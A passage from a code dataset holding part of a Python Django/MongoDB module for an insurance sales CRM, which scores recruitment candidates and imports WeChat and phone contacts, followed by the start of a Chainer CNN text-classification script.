1, #评估维度7(工作年限,A:5年以上,B:3年以上,C:1年以上,D:其他)\n 'memo': 1, #备注\n }\n }\n ]\n\n if cust_id != None and len(cust_id.strip()) != 0:\n temp_data[0]['$match']['cust_id'] = cust_id\n\n scroeRet = db.aggregate(mongoDB, 'LP_TEAM_EVALUATE', temp_data)\n scroelist = {}\n for r in scroeRet['ret']:\n scroelist[r['cust_id']]=str(r['evaluate_score'])\n\n for rc in retcust:\n if rc['cust_id'] in scroelist.keys():\n rc['evaluate_score'] = str(scroelist[rc['cust_id']])\n else:\n rc['evaluate_score'] = \"X\"\n\n if sort_name != None and is_reverse != None:\n sorted_result = sorted(retcust,key=operator.itemgetter(sort_name),reverse=int(is_reverse))\n else:\n sorted_result = sorted(retcust, key=operator.itemgetter(\"evaluate_score\"), reverse=True)\n\n return HttpResponse(\n ResultUtils.createResult(ResultUtils.SysConstants.ERROR_CODE_SUCCESS, error_msg, sorted_result))\n else:\n return HttpResponse(\n ResultUtils.createResult(ResultUtils.SysConstants.ERROR_CODE_SUCCESS, \"数据不存在\", []))\n else:\n return HttpResponse(ResultUtils.createResult(ResultUtils.SysConstants.ERROR_CODE_ERROR, \"请联系管理员\", []))\n\n#插入增员评估\ndef insertTeamEvaluateByCustID(request):\n error_msg = '增员评估追加成功'\n\n if request.method == \"POST\":\n sales_id = request.POST.get('sales_id', None)\n cust_id = request.POST.get('cust_id', None)\n team_type = request.POST.get('team_type', None)\n fact_1 = request.POST.get('fact_1', None)\n fact_2 = request.POST.get('fact_2', None)\n fact_3 = request.POST.get('fact_3', None)\n fact_4 = request.POST.get('fact_4', None)\n fact_5 = request.POST.get('fact_5', None)\n fact_6 = request.POST.get('fact_6', None)\n fact_7 = request.POST.get('fact_7', None)\n memo = request.POST.get('memo', None)\n\n # 计算增员潜力值\n # 总分大于等于23分,高A;总分大于等于13,中B,总分大于0时,低C,总分为0时,未知D\n score = 0\n # 学历\n if fact_1 == \"B\":\n score = score + 5\n elif fact_1 == \"A\":\n score = score + 3\n elif fact_1 == \"C\":\n score = score + 1\n\n # 年龄\n if fact_2 == \"A\":\n score = score + 5\n elif fact_2 == \"B\":\n score = score + 3\n elif fact_2 == \"C\":\n score = score + 1\n\n # 婚姻\n if fact_3 == \"A\":\n score = score + 5\n elif fact_3 == \"B\":\n score = score + 3\n elif fact_3 == \"C\":\n score = score + 1\n\n # 职业\n if fact_4 == \"A\":\n score = score + 5\n elif fact_4 == \"B\":\n score = score + 3\n elif fact_4 == \"C\":\n score = score + 1\n\n # 学历\n if fact_5 == \"B\":\n score = score + 5\n elif fact_5 == \"A\":\n score = score + 3\n elif fact_5 == \"C\":\n score = score + 1\n\n # 认识时间\n if fact_6 == \"A\":\n score = score + 5\n elif fact_6 == \"B\":\n score = score + 3\n elif fact_6 == \"C\":\n score = score + 1\n\n # 工作年限\n if fact_7 == \"A\":\n score = score + 5\n elif fact_7 == \"B\":\n score = score + 3\n elif fact_7 == \"C\":\n score = score + 1\n\n if score >= 21:\n evaluate_score = \"A\"\n elif score >= 12:\n evaluate_score = \"B\"\n elif score >= 1:\n evaluate_score = \"C\"\n else:\n evaluate_score = \"D\"\n\n try:\n ret_exist = db.query(mongoDB, 'LP_TEAM_EVALUATE', {'sales_id': sales_id, 'cust_id': cust_id, 'status': '1'})\n\n # 如果没有评估过,插入记录\n if ret_exist.count() == 0:\n logger.info(\"lp_team_evaluate insert begin\")\n\n ret = {}\n ret['sales_id'] = sales_id\n ret['cust_id'] = cust_id\n ret['team_type'] = team_type\n ret['evaluate_score'] = evaluate_score\n ret['fact_1'] = fact_1\n ret['fact_2'] = fact_2\n ret['fact_3'] = fact_3\n ret['fact_4'] = fact_4\n ret['fact_5'] = fact_5\n ret['fact_6'] = fact_6\n ret['fact_7'] = fact_7\n ret['memo'] = memo\n ret['create_date'] = ResultUtils.getNowToStr()\n ret['update_date'] = ResultUtils.getNowToStr()\n ret['status'] = '1'\n\n f = db.insert_item(mongoDB, 'LP_TEAM_EVALUATE', ret)\n logger.debug(f)\n else:\n f = db.update_item(mongoDB, 'LP_TEAM_EVALUATE', {'sales_id':sales_id, 'cust_id':cust_id, 'status': '1'},\n {'$set':{'team_type':team_type, 'evaluate_score':evaluate_score, 'fact_1':fact_1,\n 'fact_2': fact_2, 'fact_3': fact_3,\n 'fact_4': fact_4, 'fact_5': fact_5,\n 'fact_6': fact_6, 'fact_7': fact_7, 'memo': memo,\n 'update_date':ResultUtils.getNowToStr()}})\n logger.debug(f)\n\n return HttpResponse(\n ResultUtils.createResult(ResultUtils.SysConstants.ERROR_CODE_SUCCESS, error_msg,\n [{'evaluate_score': evaluate_score}]))\n\n except Exception as e:\n return HttpResponse(ResultUtils.createErrorResult(e))\n else:\n return HttpResponse(\n ResultUtils.createResult(ResultUtils.SysConstants.ERROR_CODE_ERROR, \"请联系管理员\", []))\n\n# 检索\ndef queryTeamEvaluateByCustID(request):\n error_msg = '增员评估检索成功'\n\n if request.method == \"POST\":\n sales_id = request.POST.get('sales_id')\n cust_id = request.POST.get('cust_id')\n\n temp_data = [\n {\n \"$match\": {\n \"status\": \"1\",\n \"sales_id\": sales_id,\n \"cust_id\": cust_id,\n }\n },\n {\n \"$project\": {\n \"_id\": 0,\n 'cust_id': 1,\n 'team_type': 1, # 增员来源\n 'evaluate_score': 1, # 增员潜力评估(X:未评估;A:高;B:中;C:低;D:未知)\n 'fact_1': 1, # 评估维度1(收入,A:2万以上,B:1万以上,C:5千以上,D:其他)\n 'fact_2': 1, # 评估维度2(年龄,A:30-40岁,B:40-50岁,C:20-30岁,D:其他)\n 'fact_3': 1, # 评估维度3(婚姻,A:已婚,B:未婚,C:离婚,D:其他)\n 'fact_4': 1, # 评估维度4(职业,A:专业人士,B:营销类,C:私营业主,D:其他)\n 'fact_5': 1, # 评估维度5(学历,A:大学,B:大专,C:高中,D:其他)\n 'fact_6': 1, # 评估维度6(认识时间,A:3年以上,B:1年以上,C:半年不到,D:其他)\n 'fact_7': 1, # 评估维度7(工作年限,A:5年以上,B:3年以上,C:1年以上,D:其他)\n 'memo': 1, # 备注\n }\n }\n ]\n\n logger.debug(temp_data)\n\n ret = db.aggregate(mongoDB, 'LP_TEAM_EVALUATE', temp_data)\n\n if ret['result'] == 1:\n return HttpResponse(\n ResultUtils.createResult(ResultUtils.SysConstants.ERROR_CODE_ERROR, ret['ret'], []))\n else:\n return HttpResponse(\n ResultUtils.createResult(ResultUtils.SysConstants.ERROR_CODE_SUCCESS, \"抽取成功\", ret['ret']))\n else:\n return HttpResponse(ResultUtils.createResult(ResultUtils.SysConstants.ERROR_CODE_ERROR, \"请联系管理员\", []))\n\ndef delByID(request):\n if request.method == \"POST\":\n cust_id = request.POST.get('cust_id')\n\n if cust_id == None or len(cust_id.strip()) == 0:\n return HttpResponse(ResultUtils.createResult(ResultUtils.SysConstants.ERROR_CODE_ERROR, \"cust id不能为空\", []))\n\n cust_ids = cust_id.split(\"#\")\n\n for cust_idx in cust_ids:\n if cust_idx != None and len(cust_idx.strip()) > 0:\n db.update_item(mongoDB, 'LP_MGNT_CUST_MST', {'cust_id':cust_idx}, {'$set':{'status':'0'}})\n\n return HttpResponse(\n ResultUtils.createResult(ResultUtils.SysConstants.ERROR_CODE_SUCCESS, '客户删除成功', []))\n else:\n return HttpResponse(ResultUtils.createResult(ResultUtils.SysConstants.ERROR_CODE_ERROR, \"请联系管理员\", []))\n\n\n# 更新数据\n# def update(request): # 第一次请求页面的时候,返回一个页面,页面有两个填写框\n# error_msg = '更新成功'\n#\n# if request.method == \"POST\":\n# id = request.POST['id']\n# logger.info(id)\n# customer = LpMgntCustMst.objects.get(id=id)\n# customer.src = ResultUtils.isUpdateValueNull(request.POST['src'],customer.src)\n# customer.phase = ResultUtils.isUpdateValueNull(request.POST['phase'],customer.phase)\n# customer.sex = ResultUtils.isUpdateValueNull(request.POST['sex'],customer.sex)\n# customer.birth_date = ResultUtils.isUpdateValueNull(request.POST['birth_date'],customer.birth_date)\n# customer.address = ResultUtils.isUpdateValueNull(request.POST['address'],customer.address)\n# customer.marriage = ResultUtils.isUpdateValueNull(request.POST['marriage'],customer.marriage)\n# customer.child = ResultUtils.isUpdateValueNull(request.POST['child'],customer.child)\n# customer.industry = ResultUtils.isUpdateValueNull(request.POST['industry'],customer.industry)\n# customer.yearly_income = ResultUtils.isUpdateValueNull(request.POST['yearly_income'],customer.yearly_income)\n# customer.yearly_expense = ResultUtils.isUpdateValueNull(request.POST['yearly_expense'],customer.yearly_expense)\n# customer.house = ResultUtils.isUpdateValueNull(request.POST['house'],customer.house)\n# customer.car = ResultUtils.isUpdateValueNull(request.POST['car'],customer.car)\n# customer.health_check = ResultUtils.isUpdateValueNull(request.POST['health_check'],customer.health_check)\n# customer.smoke = ResultUtils.isUpdateValueNull(request.POST['smoke'],customer.smoke)\n# customer.alcohol = ResultUtils.isUpdateValueNull(request.POST['alcohol'],customer.alcohol)\n# customer.phone_no = ResultUtils.isUpdateValueNull(request.POST['phone_no'],customer.phone_no)\n# customer.phone_nm = ResultUtils.isUpdateValueNull(request.POST['phone_nm'],customer.phone_nm)\n# customer.phone_company = ResultUtils.isUpdateValueNull(request.POST['phone_company'],customer.phone_company)\n# customer.phone_role = ResultUtils.isUpdateValueNull(request.POST['phone_role'],customer.phone_role)\n# customer.phone_email = ResultUtils.isUpdateValueNull(request.POST['phone_email'],customer.phone_email)\n# customer.phone_address = ResultUtils.isUpdateValueNull(request.POST['phone_address'],customer.phone_address)\n# customer.phone_group = ResultUtils.isUpdateValueNull(request.POST['phone_group'],customer.phone_group)\n# customer.wechat_no = ResultUtils.isUpdateValueNull(request.POST['wechat_no'],customer.wechat_no)\n# customer.wechat_nm = ResultUtils.isUpdateValueNull(request.POST['wechat_nm'],customer.wechat_nm)\n# customer.wechat_memo = ResultUtils.isUpdateValueNull(request.POST['wechat_memo'],customer.wechat_memo)\n# customer.wechat_img = ResultUtils.isUpdateValueNull(request.POST['wechat_img'],customer.wechat_img)\n# customer.wechat_country = ResultUtils.isUpdateValueNull(request.POST['wechat_country'],customer.wechat_country)\n# customer.wechat_city = ResultUtils.isUpdateValueNull(request.POST['wechat_city'],customer.wechat_city)\n# customer.wechat_signature = ResultUtils.isUpdateValueNull(request.POST['wechat_signature'],customer.wechat_signature)\n# customer.wechat_phone = ResultUtils.isUpdateValueNull(request.POST['wechat_phone'],customer.wechat_phone)\n# customer.wechat_linkedin = ResultUtils.isUpdateValueNull(request.POST['wechat_linkedin'],customer.wechat_linkedin)\n# customer.wechat_group = ResultUtils.isUpdateValueNull(request.POST['wechat_group'],customer.wechat_group )\n# customer.wechat_samegroup = ResultUtils.isUpdateValueNull(request.POST['wechat_samegroup'],customer.wechat_samegroup )\n# customer.weibo_id = ResultUtils.isUpdateValueNull(request.POST['weibo_id'],customer.weibo_id )\n# customer.update_date = datetime.datetime.now()\n# customer.status = ResultUtils.isUpdateValueNull(request.POST['status'],customer.status )\n# customer.zipcode = ResultUtils.isUpdateValueNull(request.POST['zipcode'],customer.zipcode )\n# customer.house_loan = ResultUtils.isUpdateValueNull(request.POST['house_loan'],customer.house_loan)\n# customer.car_loan = ResultUtils.isUpdateValueNull(request.POST['car_loan'],customer.car_loan )\n# customer.sick = ResultUtils.isUpdateValueNull(request.POST['sick'],customer.sick )\n# customer.credit = ResultUtils.isUpdateValueNull(request.POST['credit'],customer.credit )\n# customer.parent = ResultUtils.isUpdateValueNull(request.POST['parent'],customer.parent)\n# customer.save()\n#\n# # 新增或更新跑批表记录,为跑批准备\n# CommonModelUtils.saveOrUpdateLpDsSchedule(id, '0')\n#\n# return HttpResponse(ResultUtils.createResult(ResultUtils.SysConstants.ERROR_CODE_SUCCESS, error_msg, []))\n# else:\n# return HttpResponse(ResultUtils.createResult(ResultUtils.SysConstants.ERROR_CODE_ERROR,\"请联系管理员\", []))\n\n# 微信通讯录导入\ndef insertByWechat(data):\n error_msg = '微信通讯录导入成功'\n # if request.method == \"POST\":\n # data = json.loads(request.POST['body'], strict=False)\n sales_id = data['SALES_ID']\n logger.info(\"*******insertByWechat begin*******\")\n # logger.info(data)\n\n for rc in data['DATASET']:\n # 去除电话号码前的+86\n wechat_phone = rc['WECHAT_PHONE'].replace(\"+86\", \"\").strip()\n wechat_no = rc['WECHAT_NO'].strip()\n wechat_memo = rc['WECHAT_MEMO'].strip()\n wechat_name = rc['WECHAT_NAME'].strip()\n\n temp_data = []\n # TODO: 动态传参数$or,待优化\n # 微信备注与手机名称一样\n if wechat_memo != None and len(wechat_memo) != 0:\n # 微信昵称与手机名称一样\n if wechat_name != None and len(wechat_name) != 0:\n # 微信手机号与手机号码一样\n if wechat_phone != None and len(wechat_phone) != 0:\n temp_data = [\n {\n \"$match\": {\n \"sales_id\": sales_id,\n \"$or\": [\n {\"wechat_no\": {'$eq': wechat_no}},\n {\"phone_nm\": {'$eq': wechat_memo}},\n {\"phone_nm\": {'$eq': wechat_name}},\n {\"phone_no\": {'$eq': wechat_phone}},\n ],\n\n }\n },\n {\n \"$project\": {\n \"_id\": 0,\n \"cust_id\": 1,\n }\n },\n ]\n else:\n temp_data = [\n {\n \"$match\": {\n \"sales_id\": sales_id,\n \"$or\": [\n {\"wechat_no\": {'$eq': wechat_no}},\n {\"phone_nm\": {'$eq': wechat_memo}},\n {\"phone_nm\": {'$eq': wechat_name}},\n ],\n\n }\n },\n {\n \"$project\": {\n \"_id\": 0,\n \"cust_id\": 1,\n }\n },\n ]\n else:\n # 微信手机号与手机号码一样\n if wechat_phone != None and len(wechat_phone) != 0:\n temp_data = [\n {\n \"$match\": {\n \"sales_id\": sales_id,\n \"$or\": [\n {\"wechat_no\": {'$eq': wechat_no}},\n {\"phone_nm\": {'$eq': wechat_memo}},\n {\"phone_no\": {'$eq': wechat_phone}},\n ],\n\n }\n },\n {\n \"$project\": {\n \"_id\": 0,\n \"cust_id\": 1,\n }\n },\n ]\n else:\n temp_data = [\n {\n \"$match\": {\n \"sales_id\": sales_id,\n \"$or\": [\n {\"wechat_no\": {'$eq': wechat_no}},\n {\"phone_nm\": {'$eq': wechat_memo}},\n ],\n\n }\n },\n {\n \"$project\": {\n \"_id\": 0,\n \"cust_id\": 1,\n }\n },\n ]\n else:\n # 微信昵称与手机名称一样\n if wechat_name != None and len(wechat_name) != 0:\n # 微信手机号与手机号码一样\n if wechat_phone != None and len(wechat_phone) != 0:\n temp_data = [\n {\n \"$match\": {\n \"sales_id\": sales_id,\n \"$or\": [\n {\"wechat_no\": {'$eq': wechat_no}},\n {\"phone_nm\": {'$eq': wechat_name}},\n {\"phone_no\": {'$eq': wechat_phone}},\n ],\n\n }\n },\n {\n \"$project\": {\n \"_id\": 0,\n \"cust_id\": 1,\n }\n },\n ]\n else:\n temp_data = [\n {\n \"$match\": {\n \"sales_id\": sales_id,\n \"$or\": [\n {\"wechat_no\": {'$eq': wechat_no}},\n {\"phone_nm\": {'$eq': wechat_name}},\n ],\n\n }\n },\n {\n \"$project\": {\n \"_id\": 0,\n \"cust_id\": 1,\n }\n },\n ]\n else:\n # 微信手机号与手机号码一样\n if wechat_phone != None and len(wechat_phone) != 0:\n temp_data = [\n {\n \"$match\": {\n \"sales_id\": sales_id,\n \"$or\": [\n {\"wechat_no\": {'$eq': wechat_no}},\n {\"phone_no\": {'$eq': wechat_phone}},\n ],\n\n }\n },\n {\n \"$project\": {\n \"_id\": 0,\n \"cust_id\": 1,\n }\n },\n ]\n else:\n temp_data = [\n {\n \"$match\": {\n \"sales_id\": sales_id,\n \"$or\": [\n {\"wechat_no\": {'$eq': wechat_no}},\n ],\n\n }\n },\n {\n \"$project\": {\n \"_id\": 0,\n \"cust_id\": 1,\n }\n },\n ]\n\n # logger.info(temp_data)\n\n ret = db.aggregate(mongoDB, 'LP_MGNT_CUST_MST', temp_data)\n ret_val = ret['ret']\n\n if len(ret_val) == 0:\n uuid = ResultUtils.getUUID()\n retval = {\"cust_id\": uuid}\n retval['sales_id'] = sales_id\n retval['wechat_no'] = wechat_no\n retval['wechat_nm'] = wechat_name\n retval['wechat_memo'] = wechat_memo\n retval['phone_no'] = wechat_phone\n # retval['phone_nm'] = rc['WECHAT_MEMO']\n retval['sex'] = rc['SEX']\n retval['wechat_phone'] = wechat_phone\n retval['wechat_city'] = rc['WECHAT_CITY']\n retval['ext_city'] = rc['WECHAT_CITY']\n retval['create_date'] = ResultUtils.getNowToStr()\n retval['update_date'] = ResultUtils.getNowToStr()\n retval['status'] = '1'\n retval['isused'] = '0'\n retval['phase'] = '0'\n retval['star_flg'] = '0'\n retval['src'] = '1'\n retval['last_touch_date'] = None\n retval['used_ticket'] = '0'\n f = db.insert_item(mongoDB, 'LP_MGNT_CUST_MST', retval)\n\n # logger.info(f)\n # 销售员和客户关联表插入\n CommonModelUtils.saveOrUpdateLpMgntSalesCust(sales_id, uuid)\n # 新增或更新跑批表记录,为跑批准备\n CommonModelUtils.saveOrUpdateLpDsSchedule(sales_id, uuid, '0')\n\n else: # 记录存在的情况,进行更新\n f = db.update_item(mongoDB, 'LP_MGNT_CUST_MST', {'cust_id': ret_val[0]['cust_id']},\n {'$set': {'sex': rc['SEX'], 'wechat_nm': wechat_name, 'wechat_phone': wechat_phone,\n 'wechat_no': wechat_no,\n 'wechat_city': rc['WECHAT_CITY'], 'wechat_memo': wechat_memo,\n 'isused': '0', 'update_date': ResultUtils.getNowToStr()}})\n\n # logger.info(f)\n # 新增或更新跑批表记录,为跑批准备\n CommonModelUtils.saveOrUpdateLpDsSchedule(sales_id, ret_val[0]['cust_id'], '0')\n logger.info(\"*******insertByWechat end*******\")\n return ResultUtils.createResult(ResultUtils.SysConstants.ERROR_CODE_SUCCESS, error_msg, [])\n\n\n\n# 手机通讯录导入(增)\ndef insertByPhoneNumber(data):\n error_msg = '手机通讯录导入成功'\n # if request.method == \"POST\":\n # data = json.loads(request.POST['body'], strict=False)\n sales_id = data['SALES_ID']\n logger.info(\"*******insertByPhoneNumber begin*******\")\n # logger.info(data)\n\n for rc in data['DATASET']:\n phone_no = rc['PHONE_NO'].strip()\n phone_nm = rc['PHONE_NM'].strip()\n\n if phone_no == None or len(phone_no) == 0 or phone_nm == None or len(phone_nm) == 0:\n continue\n\n temp_data = [\n {\n \"$match\": {\n \"sales_id\": sales_id,\n \"$or\": [\n {\"phone_no\": {'$eq': phone_no}},\n {\"wechat_phone\": {'$eq': phone_no}},\n {\"wechat_nm\": {'$eq': phone_nm}},\n {\"wechat_memo\": {'$eq': phone_nm}},\n ],\n }\n },\n {\n \"$project\": {\n \"_id\": 0,\n \"sales_id\": 1,\n \"cust_id\": 1,\n \"phone_no\": 1,\n \"wechat_no\": 1,\n \"wechat_phone\": 1,\n \"phone_nm\": 1,\n \"wechat_nm\": 1,\n \"wechat_memo\": 1,\n }\n },\n ]\n\n ret = db.aggregate(mongoDB, 'LP_MGNT_CUST_MST', temp_data)\n\n if len(ret['ret']) == 0:\n # logger.info('phone customer insert')\n\n uuid = ResultUtils.getUUID()\n retval = {\"cust_id\": uuid}\n retval['sales_id'] = sales_id\n retval['phone_nm'] = phone_nm\n retval['phone_no'] = phone_no\n retval['create_date'] = ResultUtils.getNowToStr()\n retval['update_date'] = ResultUtils.getNowToStr()\n retval['status'] = '1'\n retval['isused'] = '0'\n retval['phase'] = '0'\n retval['star_flg'] = '0'\n retval['src'] = '0'\n retval['last_touch_date'] = None\n retval['used_ticket'] = '0'\n f = db.insert_item(mongoDB, 'LP_MGNT_CUST_MST', retval)\n # logger.info(f)\n\n # 销售员和客户关联表插入\n CommonModelUtils.saveOrUpdateLpMgntSalesCust(sales_id, uuid)\n # 新增或更新跑批表记录,为新增客户跑批准备\n CommonModelUtils.saveOrUpdateLpDsSchedule(sales_id,uuid, '0')\n # 新增或更新跑批表记录,为个推跑批准备\n # CommonModelUtils.saveOrUpdateGeiTuiLpDsSchedule(uuid, '4')\n logger.info(\"*******insertByPhoneNumber end*******\")\n\n return ResultUtils.createResult(ResultUtils.SysConstants.ERROR_CODE_SUCCESS, error_msg, [])\n # else:\n # return HttpResponse(ResultUtils.createResult(ResultUtils.SysConstants.ERROR_CODE_ERROR, \"请联系管理员\", []))\n\n\n# 更新星标状态\ndef updateStarFlg(request):\n error_msg = '客户星标更新成功'\n\n if request.method == \"POST\":\n cust_id = request.POST.get('cust_id')\n# sales_id = request.POST.get('sales_id')\n star_flg = request.POST.get('star_flg')\n\n logger.info(\"customer star flag update\" + \"|\" + cust_id + \"|\" + star_flg)\n\n try:\n ret1 = db.update_item(mongoDB, 'LP_MGNT_CUST_MST', {'cust_id': cust_id},\n {'$set': {'star_flg': star_flg,\n 'update_date': ResultUtils.getNowToStr()}})\n\n return HttpResponse(ResultUtils.createResult(ResultUtils.SysConstants.ERROR_CODE_SUCCESS, error_msg, []))\n except Exception as e:\n return HttpResponse(ResultUtils.createErrorResult(e))\n else:\n return HttpResponse(ResultUtils.createResult(ResultUtils.SysConstants.ERROR_CODE_ERROR, \"请联系管理员\", []))\n\n# 使用灵豹券\ndef useLPTicket(request):\n error_msg = '灵豹券使用成功'\n\n if request.method == \"POST\":\n sales_id = request.POST.get('sales_id')\n cust_id = request.POST.get('cust_id')\n\n if sales_id == None or len(sales_id.strip()) == 0 or cust_id == None or len(cust_id.strip()) == 0:\n return HttpResponse(ResultUtils.createResult(ResultUtils.SysConstants.ERROR_CODE_ERROR, \"sales id / cust id不能为空\", []))\n\n cust_ids = cust_id.split(\"#\")\n\n # 判断是否还有可用的灵豹券\n temp_data = [\n {\n \"$match\": {\n \"sales_id\": sales_id,\n \"$or\": [{\"used_datetime\": {\"$eq\": None}}, {\"used_datetime\": {\"$eq\": ''}}],\n }\n },\n {\n \"$project\": {\n \"_id\": 0,\n \"ticket_id\": 1,\n }\n },\n# {\n# '$limit': 1,\n# }\n ]\n\n ret = db.aggregate(mongoDB, 'LP_SALES_TICKETS_INFO', temp_data)\n\n if ret['result'] == 1:\n return ResultUtils.createResult(ResultUtils.SysConstants.ERROR_CODE_ERROR, ret['ret'], [])\n elif len(ret['ret']) < len(cust_ids):\n return ResultUtils.createResult(ResultUtils.SysConstants.ERROR_CODE_ERROR, \"您剩余的灵豹券数量不够,请购买\", [])\n else:\n idx = 0\n for cust_idx in cust_ids:\n if cust_idx != None and len(cust_idx.strip()) > 0:\n ticketNo = ret['ret'][idx]['ticket_id']\n idx = idx + 1\n\n logger.info(\"ticket used\")\n\n ret_upd = db.update_item(mongoDB, 'LP_SALES_TICKETS_INFO', {'sales_id': sales_id, 'ticket_id': ticketNo},\n {'$set': {'used_cust_id': cust_idx, 'used_datetime': ResultUtils.getNowToStr(),\n 'update_date': ResultUtils.getNowToStr()}})\n\n if ret_upd != 1:\n ret1 = db.update_item(mongoDB, 'LP_MGNT_CUST_MST', {'cust_id': cust_idx},\n {'$set': {'used_ticket': '1',\n 'update_date': ResultUtils.getNowToStr()}})\n\n # 新增或更新跑批表记录,为跑批准备\n CommonModelUtils.saveOrUpdateLpDsSchedule(sales_id, cust_idx, '4')\n\n return ResultUtils.createResult(ResultUtils.SysConstants.ERROR_CODE_SUCCESS, error_msg,\n {\"sales_id\": sales_id, \"cust_id\": cust_id})\n else:\n return ResultUtils.createResult(ResultUtils.SysConstants.ERROR_CODE_ERROR, \"请联系管理员\", [])\n\n# 获取该业务员+该客户的通话记录\ndef queryPhoneRecordByCustID(request):\n error_msg = '通话记录检索成功'\n\n if request.method == \"POST\":\n sales_id = request.POST.get('sales_id')\n cust_id = request.POST.get('cust_id')\n\n if sales_id == None or len(sales_id.strip()) == 0 or cust_id == None or len(cust_id.strip()) == 0:\n return HttpResponse(\n ResultUtils.createResult(ResultUtils.SysConstants.ERROR_CODE_ERROR, \"sales id或cust_id为Null,请联系管理员\", []))\n\n # 不显示通话时长为0的记录。1是拨入;2是拨出\n temp_data = [\n {\n \"$match\": {\n \"sales_id\": sales_id,\n \"cust_id\": cust_id,\n# \"contact_duration\": {\"$ne\": \"0\"},\n }\n },\n {\n \"$project\": {\n \"_id\": 0,\n \"contact_date\": 1,\n \"contact_duration\": 1,\n \"contact_type\": 1,\n }\n },\n {\n '$sort': {'contact_date': -1},\n },\n {\n '$limit': 5,\n }\n ]\n\n# logger.info(temp_data)\n\n ret = db.aggregate(mongoDB, 'LP_DS_PHONE', temp_data)\n\n if ret['result'] == 1:\n return HttpResponse(\n ResultUtils.createResult(ResultUtils.SysConstants.ERROR_CODE_ERROR, ret['ret'], []))\n else:\n return HttpResponse(\n ResultUtils.createResult(ResultUtils.SysConstants.ERROR_CODE_SUCCESS, \"抽取成功\", ret['ret']))\n else:\n return HttpResponse(ResultUtils.createResult(ResultUtils.SysConstants.ERROR_CODE_ERROR, \"请联系管理员\", []))\n\n# 获取该客户的朋友圈动态\ndef queryWechatGroupByCustID(request):\n error_msg = '朋友圈动态检索成功'\n\n if request.method == \"POST\":\n cust_id = request.POST.get('cust_id')\n\n if cust_id == None or len(cust_id.strip()) == 0:\n return HttpResponse(\n ResultUtils.createResult(ResultUtils.SysConstants.ERROR_CODE_ERROR, \"cust_id为Null,请联系管理员\", []))\n\n # 不显示通话时长为0的记录。1是拨入;2是拨出\n temp_data = [\n {\n \"$match\": {\n \"cust_id\": cust_id,\n \"$or\": [ { \"moment_text\": { '$ne': '' } }, { \"moment_link\": { '$ne': '' } } ],\n }\n },\n {\n \"$project\": {\n \"_id\": 0,\n \"moment_date\": {\n \"$substr\": [\"$moment_date\", 0, 10]\n },\n \"moment_text\": 1,\n \"moment_link\": 1,\n }\n },\n {\n '$sort': {'moment_date': -1},\n },\n {\n '$limit': 10,\n }\n ]\n\n# logger.info(temp_data)\n\n ret = db.aggregate(mongoDB, 'LP_DS_WECHAT', temp_data)\n\n if ret['result'] == 1:\n return HttpResponse(\n ResultUtils.createResult(ResultUtils.SysConstants.ERROR_CODE_ERROR, ret['ret'], []))\n else:\n # 去除重复数据,返回前5\n retval = []\n\n run_function = lambda x, y: x if y in x else x + [y]\n retval = reduce(run_function, [[], ] + ret['ret'])\n\n return HttpResponse(\n ResultUtils.createResult(ResultUtils.SysConstants.ERROR_CODE_SUCCESS, \"抽取成功\", retval))\n else:\n return HttpResponse(ResultUtils.createResult(ResultUtils.SysConstants.ERROR_CODE_ERROR, \"请联系管理员\", []))\n\n# 插入灵豹券(ticket_type=\"0\":灵豹券;ticket_src \"0\":注册,\"1\":会员;\"2\":购买;\"3\":分享)\ndef insertTickets(ticket_cnt, sales_id, ticket_type, ticket_src):\n \"\"\"\n :param ticket_cnt:\n :param sales_id:\n :param ticket_type: \"0\":灵豹券;\n :param ticket_src: \"0\":注册,\"1\":会员;\"2\":购买;\"3\":分享\n :return:\n \"\"\"\n try:\n for i in range(ticket_cnt):\n logger.info(\"ticket insert begin\")\n newTicket = {}\n newTicket[\"ticket_id\"] = ResultUtils.getUUID()\n newTicket[\"sales_id\"] = sales_id\n currentDT = datetime.datetime.now()\n newTicket[\"t_no\"] = \"LPT_\" + sales_id + currentDT.strftime(\n '%Y%m%d%H%M') + ResultUtils.getUUID()\n newTicket[\"t_type\"] = ticket_type # 0:灵豹券,用于精准模型分析\n newTicket[\"t_source\"] = ticket_src # 0:用户注册送券;1:成为付费会员送券;2:主动购买;3:分享送券\n newTicket[\"t_get_date\"] = ResultUtils.getNowToStr()\n newTicket[\"t_expir_date\"] = \"2099-12-31\" # 永久有效\n newTicket[\"create_date\"] = ResultUtils.getNowToStr()\n newTicket[\"update_date\"] = ResultUtils.getNowToStr()\n newTicket[\"used_cust_id\"] = None # 使用后设置\n newTicket[\"used_datetime\"] = None # 使用后设置\n newTicket[\"src\"] = \"REG\" # 使用后设置\n\n db.insert_item('Ringball', 'LP_SALES_TICKETS_INFO', newTicket)\n\n except Exception as e:\n logger.error(e.args[0])\n","sub_path":"cmdb/customer.py","file_name":"customer.py","file_ext":"py","file_size_in_byte":52101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"7649064","text":"from __future__ import print_function, unicode_literals, division\n\nimport sys\nimport numpy as np\nfrom argparse import ArgumentParser\nfrom chainer import cuda\n\nfrom cnn_word_model import WordLevelCNN\nfrom utils import trace, load_bin_vec\nfrom data_formatter import process_mr_data, format_input\n\n\ndef parse_args():\n def_epoch = 20\n def_minibatch = 50\n def_cv = 10\n def_n_filter = 100\n def_w_filter = \"3,4,5\"\n def_embed = 300\n def_w2v_model = \"./GoogleNews-vectors-negative300.bin\"\n def_gpu = -1\n\n p = ArgumentParser(description='Sentence Classification using CNN')\n\n p.add_argument('-I', '--epoch', default=def_epoch, type=int,\n help='number of training epoch (default: %d)' % def_epoch)\n p.add_argument('-B', '--batchsize', default=def_minibatch, type=int,\n help='minibatch size (default: %d)' % def_minibatch)\n p.add_argument('-CV', '--cross_varidation', default=def_cv, type=str,\n help='number of split')\n p.add_argument('-N', '--n_filter', default=def_n_filter, type=int,\n help='number of filters (default: %d)' % def_n_filter)\n p.add_argument('-W', '--w_filter', default=def_w_filter, type=str,\n help='[comma separated] list of filter widths(default:3,4,5)')\n p.add_argument('-E', '--n_embed', default=def_embed, type=int,\n help='dimension of word embeddings (default: %d)' % def_embed)\n p.add_argument('-W2V', '--w2v_model', default=def_w2v_model, type=str,\n help='w2v_model(dafault: %s)[set \"rand\" to initialize randomly]' % def_w2v_model)\n p.add_argument('-GPU', '--gpu', default=def_gpu, type=int,\n help='gpu number (negative indices using cpu) (default: %d)' % def_gpu)\n p.add_argument('--static', default=False, action='store_true', dest='static',\n help='keep word embeddings static')\n p.add_argument('--non-static', default=False, action='store_true', dest='non_static',\n help='loss back prop to word embeddings layer')\n\n args = p.parse_args()\n\n # check args\n try:\n if (args.epoch < 1):\n raise ValueError('you must set 